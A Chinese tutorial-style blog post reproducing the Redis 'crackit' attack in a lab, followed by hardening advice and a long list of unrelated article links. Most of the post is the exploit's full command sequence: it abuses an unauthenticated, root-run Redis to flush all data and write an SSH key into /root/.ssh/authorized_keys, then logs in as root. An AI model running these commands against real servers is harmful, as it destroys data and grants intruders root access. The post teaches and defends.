zyz511919766
zyz511919766

redis crackit 漏洞 过程还原

**

redis crackit 漏洞 过程还原

**
1.在两台测试机器上分别安装reids,一台作为发起攻击的机器(可以使用本地redis-cli登录远程redis-server),一台作为被攻击的机器(运行有redis-server)。

 [root@test-hadoop-s1 ~]# yum install redis -y
 [root@test-hadoop-s2 ~]# yum install redis -y

2.修改test-hadoop-s1上的redis配置文件使redis允许从任何ip地址连接(如果仅允许本地连接那么从远程发起的攻击也就无从谈起了),另外使redis无需密码便可登录(这也是使攻击者能够得逞的条件之一,若设置的有密码且密码强度相当高则攻击便能有效避免)

[root@test-hadoop-s1 ~]# vim /etc/redis.conf 
bind 0.0.0.0

注释如下内容(默认就是注释的)

# requirepass foobared

3.以root用户启动redis,若果是用/etc/init.d/redis start或者service redis start方式启动则是以redis用户(nologin用户)启动的,此时不具备/root/.ssh的目录权限,无法对其中的内容进行操作。后续的破坏行为也没办法得逞。

[root@test-hadoop-s1 ~]# sudo redis-server /etc/redis.conf

4.因为test-hadoop-s1、test-hadoop-s2均没有设置防火墙故从test-hadoop-s2可以连接至test-hadoop-s1上的redis-server。如果设置有相应的防火墙,只允许特定的主机进行连接,那么攻击行为也是可以有效避免的。

 [root@test-hadoop-s1 ~]# iptables -L -nv
Chain INPUT (policy ACCEPT 32M packets, 26G bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain OUTPUT (policy ACCEPT 34M packets, 25G bytes)
 pkts bytes target     prot opt in     out     source               destination 


 [root@test-hadoop-s2 ~]# iptables -L -nv
Chain INPUT (policy ACCEPT 86M packets, 61G bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         

Chain OUTPUT (policy ACCEPT 84M packets, 71G bytes)
 pkts bytes target     prot opt in     out     source               destination

5.测试从test-hadoop-s2 连test-hadoop-s1上的redis是可通的

[root@test-hadoop-s2 ~]# redis-cli -h test-hadoop-s1 -p 6379
redis test-hadoop-s1:6379>

也可以如下测试是否可以远程连通

[root@test-hadoop-s2 ~]# telnet test-hadoop-s1 6379
Trying 10.104.154.155...
Connected to test-hadoop-s1.
Escape character is '^]'.
echo "hello"
$7
"hello"
quit
+OK
Connection closed by foreign host.

6.在test-hadoop-s2 生成公/私秘钥对,分别保存在/root/.ssh/id_rsa.pub和/root/.ssh/id_rsa中。

[root@test-hadoop-s2 ~]# ssh-keygen -C "[email protected]"
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
3e:69:20:d1:bb:ee:dc:cc:30:7b:da:6e:90:e0:35:0b [email protected]
The key's randomart image is:
+--[ RSA 2048]----+
|                 |
|     .           |
|    . .          |
|    E.o.         |
|   ..+o+S        |
|    ..++ .       |
|      +.=        |
|     o Xo.       |
|     .*=*        |
+-----------------+

7.因为纯属测试,所以先备份一下test-hadoop-s1上原有的authorized_keys文件以便于测试完成后恢复

[root@test-hadoop-s1 ~]# cd .ssh/
[root@test-hadoop-s1 .ssh]# ll
total 16
-rw-r--r-- 1 root root 2003 Mar  2 16:25 authorized_keys
-rw------- 1 root root 1675 Mar  2 16:20 id_rsa
-rw-r--r-- 1 root root  401 Mar  2 16:20 id_rsa.pub
-rw-r--r-- 1 root root 2403 Apr  6 13:13 known_hosts
[root@test-hadoop-s1 .ssh]# mv authorized_keys authorized_keys_bak

8.通过test-hadoop-s2重新在命令行中配置redis的持久化目录和备份文件名,使备份目录为保存公/私钥的目录/root/.ssh,备份文件名为authorized_keys

[root@test-hadoop-s2 ~]# redis-cli -h test-hadoop-s1 -p 6379
redis test-hadoop-s1:6379> config set dir /root/.ssh
OK
redis test-hadoop-s1:6379> config set dbfilename "authorized_keys"
OK

9.在test-hadoop-s2连接test-hadoop-s1上的redis,清空所有db并将test-hadoop-s2生成的公钥写进crackit这个key并持久保存在备份文件中

[root@test-hadoop-s2 ~]# redis-cli -h test-hadoop-s1 -p 6379 flushall
OK
[root@test-hadoop-s2 ~]# (echo -e '\n';cat /root/.ssh/id_rsa.pub;echo -e '\n') | redis-cli -h test-hadoop-s1 -p 6379  -x set crackit
OK
[root@test-hadoop-s2 ~]# redis-cli -h test-hadoop-s1 -p 6379 save
OK

这样一来test-hadoop-s2的公钥便被写进了test-hadoop-s1的/root/.ssh/authorized_keys文件中,可以在test-hadoop-s2无密码登录test-hadoop-s1了

10.测试连接,通过ssh命令利用私钥进行登录

[root@test-hadoop-s2 ~]# ssh -i /root/.ssh/id_rsa root@test-hadoop-s1
Last login: Tue Apr 19 16:17:38 2016 from 10.104.142.115
[root@test-hadoop-s1 ~]#

好了,现在可以通过root用户为所欲为了!!!

从还原漏洞的过程就可以了解到该如何避免被攻击了。可以从以下下几个方面防御:

  • 用redis用户启动redis服务,避免使用root用户启动
  • 为redis配置强度较高的密码,不要使用空密码、弱密码或者默认密码
  • 限定redis只能从特定主机访问,如127.0.0.1,而非允许所有主机0.0.0.0
  • 修改默认6379端口
  • 禁用特殊的命令,如flushall、config等
  • 为redis服务所在的主机配置一道坚实的防火墙

你可能感兴趣的:(Redis)

  • Redis Copy-on-Write机制: SHENKEM redis数据库缓存
    Copy-on-Write机制:父子进程共享内存页当父进程修改数据时,内核会复制被修改的页这可能导致内存使用量暂时增加通俗的话描述一下可以用一个生活中的例子来通俗解释Copy-on-Write(写时复制)机制:比喻:父子共用一本作业本假设有一对父子(父进程和子进程)要完成以下任务:初始状态:父亲有一本写满数据的作业本(Redis内存数据),现在孩子需要做一份完全相同的作业(RDB持久化)。传统方式
  • Redis——BigKey A2274 Java面试#RedisredisjavaBigKey
    BigKey1多大算BigKey?阿里云Redis开发规范:string类型的数据控制在10KB以内,hash,list,set,zset元素数量不要超过5000。非字符串的BigKey,不要使用del删除,而是使用hsacn,sscan,zscan方式渐进式删除。同时,要防止BigKey过期时自动删除,因为自动删除会使用del指令。2.BigKey有什么危害?如果没有配置Redis非阻塞删除,则
  • 【MoodVine】DeepSeek聊天持久化(2):Spring AI + Redis实现对话记忆管理 一只鱼吖 【西瓜和晚霞】MoodVinespringredisjava
    在上一篇文章中,我们介绍了如何引入SpringAI,本文将深入探讨如何实现聊天记录的持久化存储。一、初始方案:内存存储的局限性在项目初期,我们使用简单的内存存储实现聊天记录管理:创建ChatController@RestController@RequestMapping("/chat")publicclassChatController{privatefinalOllamaChatModeloll
  • 【大模型记忆实战Demo】基于SpringAIAlibaba通过内存和Redis两种方式实现多轮记忆对话 Sao_E redis数据库缓存ai语言模型
    文章目录多轮对话记忆管理——基于Memory的对话记忆基于内存存储历史对话基于Redis存储历史对话多轮对话记忆管理——基于Memory的对话记忆SpringAIAlibaba共实现了三种方式:基于内存的方式基于jdbc(数据库)的方式基于redis的方式下文主要演示基于内存和redis的方式基于内存存储历史对话代码首先定义大模型的角色,一个旅游规划师设置增强拦截器接着接口传入prompt和cha
  • redis-plus-plus安装与使用 Yu_Lijing redis数据库缓存
    目录一.安装hiredis二.接口三.使用四.总结C++操作redis的库有很多.咱们使用redis-plus-plus.这个库的功能强大,使用简单.Github地址:https://github.com/sewenew/redis-plus-plus一.安装hiredisredis-plus-plus是基于hiredis实现的.hiredis是一个C语言实现的redis客户端.因此需要先安装hi
  • YAML基础使用教程(单引号和双引号的区别) 奔跑吧邓邓子 工具使用YAML单引号双引号
    提示:“奔跑吧邓邓子”的高效运维专栏聚焦于各类运维场景中的实际操作与问题解决。内容涵盖服务器硬件(如IBMSystem3650M5)、云服务平台(如腾讯云、华为云)、服务器软件(如Nginx、Apache、GitLab、Redis、Elasticsearch、Kubernetes、Docker等)、开发工具(如Git、HBuilder)以及网络安全(如挖矿病毒排查、SSL证书配置)等多个方面。无论
  • 【Redis】StringRedisTemplate 和 RedisTemplate 的区别 星星点点洲 redis缓存
    StringRedisTemplate和RedisTemplate是SpringDataRedis提供的两种用于操作Redis的模板类,它们的核心区别在于序列化方式和操作的数据类型。以下是两者的主要区别和使用建议:✅1.数据类型支持类名支持的数据类型说明RedisTemplate支持所有Redis数据结构(如String、Hash、List、Set、ZSet)可以操作任意Java对象,但需要手动配
  • nestjs[一文学懂nestjs中对npm功能包的封装,ioredis封装示例] 墨水白云 npm前端node.js
    问题描述NPM(NodePackageManager)是Node.js的包管理工具,它允许开发者轻松地分享、安装和管理依赖包,促进了代码的复用性和项目协作。而npm插件库将是nodejs开发中不可缺失的重要组成因素。在nestjs中,官方已经给我们开发了一系列各种各样的封装功能让我们能够快速的进行开发。然而实际应用中,我们在开发的过程中任然需要引入各种各样的插件工具,因此学会封装nestjs组件功
  • Redis大Key问题 MQLYES redisredis数据库缓存
    文章目录1.什么是大key2.如何衡量大key3.大key有什么影响4.大key是如何产生的5.如何发现大key6.如何解决大key1.什么是大keyRediskey和value的最大限制都是512M,超过了Redis会拒绝这个操作,并返回一个错误信息给客户端。例如,可能会收到类似ERRkeytoobig的消息,具体的错误信息可能依据Redis版本的不同而有所变化。但我们这里讨论的大key是指的v
  • redis-transaction zhangsanzhu
    redis-transaction注意不支持回滚操作是因为redis是先执行指令然后做日志,所以即使发生异常,没有可以用来执行回滚操作的日志。只保证事物的隔离性,不保证原子性.redis禁止在multi和exec之间执行watch指令,而必须在multi之前做好盯住关键变量,否则会出错。事物的过程multi:事物的开始(创建一个事物);exec:事物的执行;discard:丢弃这个事物;127.0
  • 实现分布式锁
    在黑马点评项目中,在实现分布式锁的时候提到了实现的几种方式,本文来简单了解一下。一、MySQL、Redis、ZooKeeper是不是都是“数据库”?严格来说,三者的定位和功能差异很大,但广义上都可以视为“数据存储系统”,不过它们的核心设计目标和适用场景完全不同。我们可以从“数据模型”和“核心用途”两个维度区分:类型MySQLRedisZooKeeper核心定位关系型数据库(OLTP,事务型存储)内
  • SpringBoot 实现 Redis读写分离
    RedisTemplate的哨兵模式在Sentinel集群监管下的Redis主从集群,其节点会因为自动故障转移而发生变化,Redis的客户端必须感知这种变化,及时更新连接信息。Spring的RedisTemplate底层利用lettuce实现了节点的感知和自动切换。1.在pom文件中引入redis的starter依赖:org.springframework.bootspring-boot-star
  • Redis入门教程(一):基本数据类型
    一、Redis是什么?为什么你需要它?Redis(RemoteDictionaryServer)是一个开源的内存数据结构存储系统,它可以用作数据库、缓存和消息中间件。与传统的关系型数据库不同,Redis将数据存储在内存中,使其读写速度达到惊人的11万次读/秒和8.1万次写/秒。同时支持数据持久化,重启后数据不丢失,完美平衡了速度与可靠性。Redis的五大核心优势:丰富的数据结构:支持字符串(Str
  • java学习day6 + leetcode31 下一个排列 冬夜戏雪 java学习算法
    1.消息队列和一些功能P74P75P76基于stream的消息队列单消费模式消费者组P77基于消息队列的异步秒杀下单shift2提及,插入已知笔记P78探店笔记P79查看探店笔记p80点赞功能一人一赞这里也有并发P81点赞排行榜sortedsetset集合的选择redis里面的zsetmybatis改sql排序语句p82好友关注关注和取关p83共同关注redis里的set交集功能解析id集合没看懂
  • Spring Boot+Redis+Caffeine 二级缓存架构的终极实现方案、包含万级QPS下的黄金配置参数、全文超过2500字(博君一赞) 夜雨hiyeyu.com javaspringbootredis架构后端javaspringcloudspring
    SpringBoot+Redis+Caffeine二级缓存架构的终极实现方案、包含万级QPS下的黄金配置参数、全文超过2500字(博君一赞)一、架构设计原理(10万QPS基石)设计优势:二、Caffeine本地缓存原子级配置1.高性能缓存构造器2.容量智能计算算法3.动态TTL策略三、Redis集群极致优化(支撑百万OPS)1.Lettuce连接池配置2.Redis服务端关键配置3.Pipelin
  • Redis中什么是看门狗机制 sevevty-seven redis
    在Redis中,“看门狗机制”(WatchdogMechanism)不是Redis的核心机制之一,但它在一些场景中起到了重要作用,尤其是在使用Redlock分布式锁实现或在RedisEnterprise等高级用法中。一、看门狗机制的通用含义看门狗机制,本质上是一个自动续约或自动重置超时时间的机制,用于防止某些资源(如锁)在没有显式释放的情况下过早失效。二、在Redis中的典型应用场景1.Redis
  • Redis实战:第一章-初识Redis案例-文章投票 随风而醒 MySQL/数据库redis
    redis全称REmoteDIctionaryServer,即远程字典服务,是一个由SalvatoreSanfilippo写的key-value存储系统。Redis是一个开源的使用ANSIC语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。它通常被称为数据结构服务器,因为值(value)可以是字符串(String),哈希(Map),
  • Redis面试精讲 Day 4:Redis事务与原子性保证 在未来等你 Redis面试专栏Redis面试数据库缓存
    【Redis面试精讲Day4】Redis事务与原子性保证开篇欢迎来到"Redis面试精讲"系列的第4天!今天我们将深入探讨Redis的事务机制与原子性保证,这是Redis面试中出现频率极高的核心知识点。掌握Redis事务不仅能帮助你在面试中脱颖而出,更能让你在实际开发中合理利用事务特性构建可靠的分布式系统。在面试中,面试官通常会通过以下方式考察候选人对Redis事务的理解:解释Redis事务的基本
  • Reids 子柒s redis数据库
    标题目录Redis概述Redis数据库特点Redis应用场景Redis安装RockyLinux操作系统Windows操作系统Mac操作系统Redis服务启动失败解决方案配置文件详解常见数据类型全局命令String类型字符串数值应用场景列表List基本命令应用场景Hash散列特性基本命令应用场景Set类型基本命令应用场景SortedSet类型有序集合示例基本命令应用场景数据持久化RDB数据持久化SA
  • Redis的协同和异步 weixin_43982809 redis数据库缓存
    Redispipline多条命令同时发给redisredis返回多个结果hiredis提供接口Redis的事务事务由程序员规定(多条连接共同操作)MuLTI事务开始EXEC事务提交Discard取消事务Watch检测变动乐观锁提交的时候才查看如果值被改变取消事务用lua的脚本实现事务lua代码执行多个命令scriptload编译lua并返回idevalshaid服务器启动时全部进行编译得到多个ha
  • 【Redis篇】数据库架构演进中Redis缓存的技术必然性—高并发场景下穿透、击穿、雪崩的体系化解决方案 奈斯DB Redis专栏缓存redis数据库架构运维
    《博主主页》:CSDN主页__奈斯DBIFClub社区主页__奈斯、《擅长领域》:擅长阿里云AnalyticDBforMySQL(分布式数据仓库)、Oracle、MySQL、Linux、prometheus监控;并对SQLserver、NoSQL(Redis)有了解如果觉得文章对你有所帮助,欢迎点赞收藏加关注作为DBA或运维在日常与Redis打交道时,往往更关注部署安装、Key清理、内存回收、备份
  • 【算法-贪心算法-python】柠檬水找零 檀越@新空间 P1算法与数据结构s1Python算法贪心算法python
    欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。推荐:kuan的首页,持续学习,不断总结,共同进步,活到老学到老导航檀越剑指大厂系列:全面总结java核心技术点,如集合,jvm,并发编程redis,kafka,Spring,微服务,Netty等常用开发工具系列:罗列常用的开发工具,如IDEA,M
  • Redis的ziplist与hashtable性能对比测试 无级程序员 java数据库大数据
    测试一下ziplist长度为2048时性能。机器为4C,8G虚拟机另外,记录一下,200个节点的Redis集群要消耗大约200mbps带宽用于节点间通讯。
  • Redis缓存四件套的学习(七) 冷崖 Redisredis缓存
    一、缓存四件套1.1、缓存预热1.1.1、什么是缓存预热缓存预热就是在系统启动前,将数据提前加载到缓存中,这样就可以避免在用户请求的时候,先查询数据库,然后再将数据回写到缓存中1.1.2、如何实现缓存预热什么都不做,只对数据库操作,利用redis回写机制,逐步将数据库的数据同步到缓存中。-------最好晚上部署完成之后,自己人提前做一次,让数据写回缓存,别把这个问题交给用户。通过中间件或程序自行
  • 人脸检测算法——SCRFD 海绵波波107 #计算机视觉算法计算机视觉
    SCRFD算法核心解析1.算法定义与背景SCRFD(SampleandComputationRedistributionforEfficientFaceDetection)由JiaGuo等人于2021年在arXiv提出,是一种高效、高精度的人脸检测算法,其核心创新在于:双重重分配策略:样本重分配(SR):动态增强关键训练阶段的样本数据。计算重分配(CR):通过神经架构搜索(NAS)优化骨干网络(B
  • Lua + Redis + SpringBoot = 王炸!
    第一部分:Lua脚本简介第二部分:为什么选择Lua脚本第三部分:lua脚本的应用场景第四部分:Lua脚本在SpringBoot中的实现第五部分:Lua脚本来提高SpringBoot应用程序的性能第六部分:错误处理和安全性第七部分:最佳实践和建议曾经有一位魔术师,他擅长将SpringBoot和Redis这两个强大的工具结合成一种令人惊叹的组合。他的魔法武器是Redis的Lua脚本。今天,我们将揭开这
  • 【laravel+redis】分布式锁的实现 起灵人 phplaravelredislaravelredisphp
    laravel官方支持“原子锁”,并且说“要使用这个功能,应用必须使用memcached、dynamodb、redis、database或array缓存驱动作为应用默认的缓存驱动,此外,所有服务器必须和同一台中央缓存服务器进行通信”。前半句不多解释,后半句也强调了laravel的原子锁不负责在集群架构中保障故障转移期间的数据安全性。我贴一下laravel的源码看一下它是怎样用redis实现的分布式
  • 绝佳组合 SpringBoot + Lua + Redis = 王炸!
    Java精选面试题(微信小程序):5000+道面试题和选择题,真实面经,简历模版,包含Java基础、并发、JVM、线程、MQ系列、Redis、Spring系列、Elasticsearch、Docker、K8s、Flink、Spark、架构设计、大厂真题等,在线随时刷题!前言曾经有一位魔术师,他擅长将SpringBoot和Redis这两个强大的工具结合成一种令人惊叹的组合。他的魔法武器是Redis的
  • 绝佳组合 Lua + Redis + SpringBoot = 王炸! Java精选 luaredisspringbootjunit单元测试
    前言曾经有一位魔术师,他擅长将SpringBoot和Redis这两个强大的工具结合成一种令人惊叹的组合。他的魔法武器是Redis的Lua脚本。今天,我们将揭开这个魔术师的秘密,探讨如何在SpringBoot项目中使用Lua脚本,以解锁新的可能性和提高性能。如果你一直在寻找提升你的应用程序的方法,那么这篇博客将为你揭示其中的神奇之处。Lua脚本简介当涉及Lua编程时,以下是对前述12个关键概念的详细
  • Spring Boot + Lua = 王炸! 程序没有bug Javaspringboot编程java后端
    曾经有一位魔术师,他擅长将SpringBoot和Redis这两个强大的工具结合成一种令人惊叹的组合。他的魔法武器是Redis的Lua脚本。今天,我们将揭开这个魔术师的秘密,探讨如何在SpringBoot项目中使用Lua脚本,以解锁新的可能性和提高性能。如果你一直在寻找提升你的应用程序的方法,那么这篇博客将为你揭示其中的神奇之处。第一部分:Lua脚本简介当涉及Lua编程时,以下是对前述12个关键概念
  • TOMCAT在POST方法提交参数丢失问题 357029540 javatomcatjsp
    摘自http://my.oschina.net/luckyi/blog/213209 昨天在解决一个BUG时发现一个奇怪的问题,一个AJAX提交数据在之前都是木有问题的,突然提交出错影响其他处理流程。 检查时发现页面处理数据较多,起初以为是提交顺序不正确修改后发现不是由此问题引起。于是删除掉一部分数据进行提交,较少数据能够提交成功。 恢复较多数据后跟踪提交FORM DATA ,发现数
  • 在MyEclipse中增加JSP模板 删除-2008-08-18 ljy325 jspxmlMyEclipse
    在D:\Program Files\MyEclipse 6.0\myeclipse\eclipse\plugins\com.genuitec.eclipse.wizards_6.0.1.zmyeclipse601200710\templates\jsp  目录下找到Jsp.vtl,复制一份,重命名为jsp2.vtl,然后把里面的内容修改为自己想要的格式,保存。 然后在 D:\Progr
  • JavaScript常用验证脚本总结 eksliang JavaScriptjavaScript表单验证
         转载请出自出处:http://eksliang.iteye.com/blog/2098985        下面这些验证脚本,是我在这几年开发中的总结,今天把他放出来,也算是一种分享吧,现在在我的项目中也在用!包括日期验证、比较,非空验证、身份证验证、数值验证、Email验证、电话验证等等...! &nb
  • 微软BI(4) 18289753290 微软BI SSIS
    1) Q:查看ssis里面某个控件输出的结果:  A MessageBox.Show(Dts.Variables["v_lastTimestamp"].Value.ToString()); 这是我们在包里面定义的变量 2):在关联目的端表的时候如果是一对多的关系,一定要选择唯一的那个键作为关联字段。 3) Q:ssis里面如果将多个数据源的数据插入目的端一
  • 定时对大数据量的表进行分表对数据备份 酷的飞上天空 大数据量
    工作中遇到数据库中一个表的数据量比较大,属于日志表。正常情况下是不会有查询操作的,但如果不进行分表数据太多,执行一条简单sql语句要等好几分钟。。   分表工具:linux的shell + mysql自身提供的管理命令 原理:使用一个和原表数据结构一样的表,替换原表。   linux shell内容如下: =======================开始 
  • 本质的描述与因材施教 永夜-极光 感想随笔
             不管碰到什么事,我都下意识的想去探索本质,找寻一个最形象的描述方式。        我坚信,世界上对一件事物的描述和解释,肯定有一种最形象,最贴近本质,最容易让人理解        &
  • 很迷茫。。。 随便小屋 随笔
    小弟我今年研一,也是从事的咱们现在最流行的专业(计算机)。本科三流学校,为了能有个更好的跳板,进入了考研大军,非常有幸能进入研究生的行业(具体学校就不说了,怕把学校的名誉给损了)。   先说一下自身的条件,本科专业软件工程。主要学习就是软件开发,几乎和计算机没有什么区别。因为学校本身三流,也就是让老师带着学生学点东西,然后让学生毕业就行了。对专业性的东西了解的非常浅。就那学的语言来说
  • 23种设计模式的意图和适用范围 aijuans 设计模式
    Factory Method 意图 定义一个用于创建对象的接口,让子类决定实例化哪一个类。Factory Method 使一个类的实例化延迟到其子类。   适用性 当一个类不知道它所必须创建的对象的类的时候。   当一个类希望由它的子类来指定它所创建的对象的时候。   当类将创建对象的职责委托给多个帮助子类中的某一个,并且你希望将哪一个帮助子类是代理者这一信息局部化的时候。 Abstr
  • Java中的synchronized和volatile aoyouzi javavolatilesynchronized
    说到Java的线程同步问题肯定要说到两个关键字synchronized和volatile。说到这两个关键字,又要说道JVM的内存模型。JVM里内存分为main memory和working memory。 Main memory是所有线程共享的,working memory则是线程的工作内存,它保存有部分main memory变量的拷贝,对这些变量的更新直接发生在working memo
  • js数组的操作和this关键字 百合不是茶 js数组操作this关键字
    js数组的操作;   一:数组的创建: 1、数组的创建 var array = new Array(); //创建一个数组 var array = new Array([size]); //创建一个数组并指定长度,注意不是上限,是长度 var arrayObj = new Array([element0[, element1[, ...[, elementN]]]
  • 别人的阿里面试感悟 bijian1013 面试分享工作感悟阿里面试
    原文如下:http://greemranqq.iteye.com/blog/2007170         一直做企业系统,虽然也自己一直学习技术,但是感觉还是有所欠缺,准备花几个月的时间,把互联网的东西,以及一些基础更加的深入透析,结果这次比较意外,有点突然,下面分享一下感受吧!    &nb
  • 淘宝的测试框架Itest Bill_chen springmaven框架单元测试JUnit
    Itest测试框架是TaoBao测试部门开发的一套单元测试框架,以Junit4为核心, 集合DbUnit、Unitils等主流测试框架,应该算是比较好用的了。 近期项目中用了下,有关itest的具体使用如下: 1.在Maven中引入itest框架: <dependency>   <groupId>com.taobao.test</groupId&g
  • 【Java多线程二】多路条件解决生产者消费者问题 bit1129 java多线程
    package com.tom; import java.util.LinkedList; import java.util.Queue; import java.util.concurrent.ThreadLocalRandom; import java.util.concurrent.locks.Condition; import java.util.concurrent.loc
  • 汉字转拼音pinyin4j 白糖_ pinyin4j
    以前在项目中遇到汉字转拼音的情况,于是在网上找到了pinyin4j这个工具包,非常有用,别的不说了,直接下代码:   import java.util.HashSet; import java.util.Set; import net.sourceforge.pinyin4j.PinyinHelper; import net.sourceforge.pinyin
  • org.hibernate.TransactionException: JDBC begin failed解决方案 bozch ssh数据库异常DBCP
    org.hibernate.TransactionException: JDBC begin failed:     at org.hibernate.transaction.JDBCTransaction.begin(JDBCTransaction.java:68)    at org.hibernate.impl.SessionImp
  • java-并查集(Disjoint-set)-将多个集合合并成没有交集的集合 bylijinnan java
    import java.util.ArrayList; import java.util.Arrays; import java.util.HashMap; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Map; import java.ut
  • Java PrintWriter打印乱码 chenbowen00 java
    一个小程序读写文件,发现PrintWriter输出后文件存在乱码,解决办法主要统一输入输出流编码格式。 读文件: BufferedReader 从字符输入流中读取文本,缓冲各个字符,从而提供字符、数组和行的高效读取。 可以指定缓冲区的大小,或者可使用默认的大小。大多数情况下,默认值就足够大了。 通常,Reader 所作的每个读取请求都会导致对基础字符或字节流进行相应的读取请求。因
  • [天气与气候]极端气候环境 comsci 环境
          如果空间环境出现异变...外星文明并未出现,而只是用某种气象武器对地球的气候系统进行攻击,并挑唆地球国家间的战争,经过一段时间的准备...最大限度的削弱地球文明的整体力量,然后再进行入侵......      那么地球上的国家应该做什么样的防备工作呢?  &n
  • oracle order by与union一起使用的用法 daizj UNIONoracleorder by
    当使用union操作时,排序语句必须放在最后面才正确,如下: 只能在union的最后一个子查询中使用order by,而这个order by是针对整个unioning后的结果集的。So: 如果unoin的几个子查询列名不同,如 Sql代码  select supplier_id, supplier_name  from suppliers  UNI
  • zeus持久层读写分离单元测试 deng520159 单元测试
    本文是zeus读写分离单元测试,距离分库分表,只有一步了.上代码: 1.ZeusMasterSlaveTest.java package com.dengliang.zeus.webdemo.test; import java.util.ArrayList; import java.util.List; import org.junit.Assert; import org.j
  • Yii 截取字符串(UTF-8) 使用组件 dcj3sjt126com yii
    1.将Helper.php放进protected\components文件夹下。 2.调用方法:   Helper::truncate_utf8_string($content,20,false);   //不显示省略号  Helper::truncate_utf8_string($content,20);  //显示省略号  &n
  • 安装memcache及php扩展 dcj3sjt126com PHP
    安装memcache    tar zxvf memcache-2.2.5.tgz     cd memcache-2.2.5/     /usr/local/php/bin/phpize (?)    ./configure --with-php-confi
  • JsonObject 处理日期 feifeilinlin521 javajsonJsonOjbectJsonArrayJSONException
        写这边文章的初衷就是遇到了json在转换日期格式出现了异常 net.sf.json.JSONException: java.lang.reflect.InvocationTargetException  原因是当你用Map接收数据库返回了java.sql.Date 日期的数据进行json转换出的问题话不多说  直接上代码  &n
  • Ehcache(06)——监听器 234390216 监听器listenerehcache
    监听器          Ehcache中监听器有两种,监听CacheManager的CacheManagerEventListener和监听Cache的CacheEventListener。在Ehcache中,Listener是通过对应的监听器工厂来生产和发生作用的。下面我们将来介绍一下这两种类型的监听器。  
  • activiti 自带设计器中chrome 34版本不能打开bug的解决 jackyrong Activiti
      在acitivti modeler中,如果是chrome 34,则不能打开该设计器,其他浏览器可以, 经证实为bug,参考 http://forums.activiti.org/content/activiti-modeler-doesnt-work-chrome-v34 修改为,找到 oryx.debug.js 在最头部增加 if (!Document.
  • 微信收货地址共享接口-终极解决 laotu5i0 微信开发
       最近要接入微信的收货地址共享接口,总是不成功,折腾了好几天,实在没办法网上搜到的帖子也是骂声一片。我把我碰到并解决问题的过程分享出来,希望能给微信的接口文档起到一个辅助作用,让后面进来的开发者能快速的接入,而不需要像我们一样苦逼的浪费好几天,甚至一周的青春。各种羞辱、谩骂的话就不说了,本人还算文明。    如果你能搜到本贴,说明你已经碰到了各种 ed
  • 关于人才 netkiller.github.com 工作面试招聘netkiller人才
    关于人才 每个月我都会接到许多猎头的电话,有些猎头比较专业,但绝大多数在我看来与猎头二字还是有很大差距的。 与猎头接触多了,自然也了解了他们的工作,包括操作手法,总体上国内的猎头行业还处在初级阶段。 总结就是“盲目推荐,以量取胜”。 目前现状 许多从事人力资源工作的人,根本不懂得怎么找人才。处在人才找不到企业,企业找不到人才的尴尬处境。 企业招聘,通常是需要用人的部门提出招聘条件,由人
  • 搭建 CentOS 6 服务器 - 目录 rensanning centos
    (1) 安装CentOS ISO(desktop/minimal)、Cloud(AWS/阿里云)、Virtualization(VMWare、VirtualBox) 详细内容 (2) Linux常用命令 cd、ls、rm、chmod...... 详细内容 (3) 初始环境设置 用户管理、网络设置、安全设置...... 详细内容 (4) 常驻服务Daemon
  • 【求助】mongoDB无法更新主键 toknowme mongodb
      Query query = new Query();          query.addCriteria(new Criteria("_id").is(o.getId()));                &n
  • jquery 页面滚动到底部自动加载插件集合 xp9802 jquery
    很多社交网站都使用无限滚动的翻页技术来提高用户体验,当你页面滑到列表底部时候无需点击就自动加载更多的内容。下面为你推荐 10 个 jQuery 的无限滚动的插件: 1. jQuery ScrollPagination jQuery ScrollPagination plugin 是一个 jQuery 实现的支持无限滚动加载数据的插件。 2. jQuery Screw S
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他